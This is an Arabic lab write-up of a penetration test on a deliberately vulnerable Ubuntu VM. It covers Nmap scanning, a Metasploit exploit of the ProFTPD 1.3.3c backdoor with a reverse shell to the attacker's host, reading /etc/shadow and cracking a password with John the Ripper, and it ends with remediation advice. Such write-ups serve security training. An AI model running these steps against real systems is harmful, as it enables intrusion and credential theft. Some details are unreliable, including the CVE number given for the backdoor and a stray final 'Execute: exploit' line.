
دليل اختبار اختراق على جهاز Ubuntu افتراضي قابل للاختراق. تم استغلال الثغرة الخلفية ProFTPD 1.3.3c (CVE-2010-4221) للحصول على صلاحيات الجذر والحصول على العلم. يتضمن تعداد Nmap، إعداد حمولة Metasploit، وكسر تجزئة المستخدمين (John the Ripper).
مختبر الأمن الهجومي : استغلال الباب الخلفي لـ ProFTPD 1.3.3c (علم الجذر)
يقدم هذا التقرير تفاصيل اختبار الاختراق الذي تم إجراؤه على آلة افتراضية (VM) ضعيفة تعمل بنظام لينكس، مع التركيز على تحديد ثغرة خدمة عالية المخاطر سمحت بالوصول الفوري إلى صلاحيات الجذر.
| التفاصيل | القيمة |
|---|---|
| عنوان IP الهدف | [ 192.168.222.130] |
| عنوان IP المهاجم (LHOST) | [ 192.168.222.128] |
| نظام التشغيل المستهدف | Ubuntu 4ubuntu2.2 (نواة لينكس 3.x) |
| الهدف | الحصول على شل بمستوى الجذر واسترجاع ملف العلم. |
تضمن الاستطلاع الأولي فحص الخدمات باستخدام Nmap لتحديد المنافذ المفتوحة وإصدارات الخدمات.
الأمر:
sudo nmap -sS -sV 192.168.222.130
النتائج الرئيسية:
| المنفذ | الخدمة | الإصدار | المخاطرة | | :--- | :--- | :--- | :---
| 21/tcp | ftp | ProFTPD 1.3.3c | حرج (باب خلفي قابل للاستغلال) |
| 22/tcp | ssh | OpenSSH 7.2p2 | منخفضة (خدمة قياسية) |
| 80/tcp | http | Apache httpd 2.4.18 | منخفضة (لم يتم العثور على ثغرة ويب واضحة) |
أكد فحص نصوص الثغرات اللاحق وجود باب خلفي شديد الخطورة داخل خدمة FTP.
أظهر إخراج نص Nmap بوضوح تنفيذ الأوامر كمستخدم جذر:
| ftp-proftpd-backdoor:
| هذا التثبيت يحتوي على باب خلفي.
| الأمر: id
|_ النتيجة: uid=0(root) gid=0(root) groups=0(root)...
3. الاستغلال والحصول على شل الجذر
تم استخدام إطار Metasploit للاستفادة من الباب الخلفي المؤكد لـ ProFTPD.
خطوات الاستغلال:
إطلاق Metasploit: msfconsole
تحديد وحدة الاستغلال: use exploit/unix/ftp/proftpd_133c_backdoor
ضبط الخيارات:
Bash
set RHOSTS 192.168.222.130
set PAYLOAD cmd/unix/reverse
set LHOST 192.168.222.128
النتيجة: تم إنشاء جلسة شل أوامر بنجاح، مع منح صلاحيات جذر فورية (uid=0).
4. ما بعد الاستغلال واسترجاع العلم
جمع بيانات الاعتماد
تم استخراج تجزئات المستخدمين من /etc/shadow لتحليل ما بعد الاستغلال. تم كسر تجزئة المستخدم marlinspike بنجاح باستخدام John the Ripper.
الأمر المستخدم (على آلة المهاجم):
Bash
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
بيانات الاعتماد المكسورة:
المستخدم: marlinspike
كلمة المرور: marlinspike
5. توصيات العلاج
وضع الأمان للنظام ضعيف للغاية بسبب خدمة FTP المخترقة. يجب اتخاذ خطوات فورية لتأمين النظام:
التصحيح/الترقية الفورية: يجب تصحيح أو ترقية خدمة ProFTPD فورًا إلى إصدار آمن (أكبر من 1.3.3g) لإصلاح الباب الخلفي المعروف وCVEs ذات الصلة.
إزالة الخدمة: إذا لم تكن FTP مطلوبة لوظيفة النظام، فيجب إزالة الخدمة بالكامل.
جدار الحماية: تنفيذ قواعد جدار حماية صارمة (iptables/ufw) لحظر الوصول الخارجي إلى المنفذ 21.
تكوينات شل آمنة: مراجعة تكوينات SSH لتعطيل تسجيل الدخول كجذر وفرض المصادقة القائمة على المفاتيح.
Execute: exploit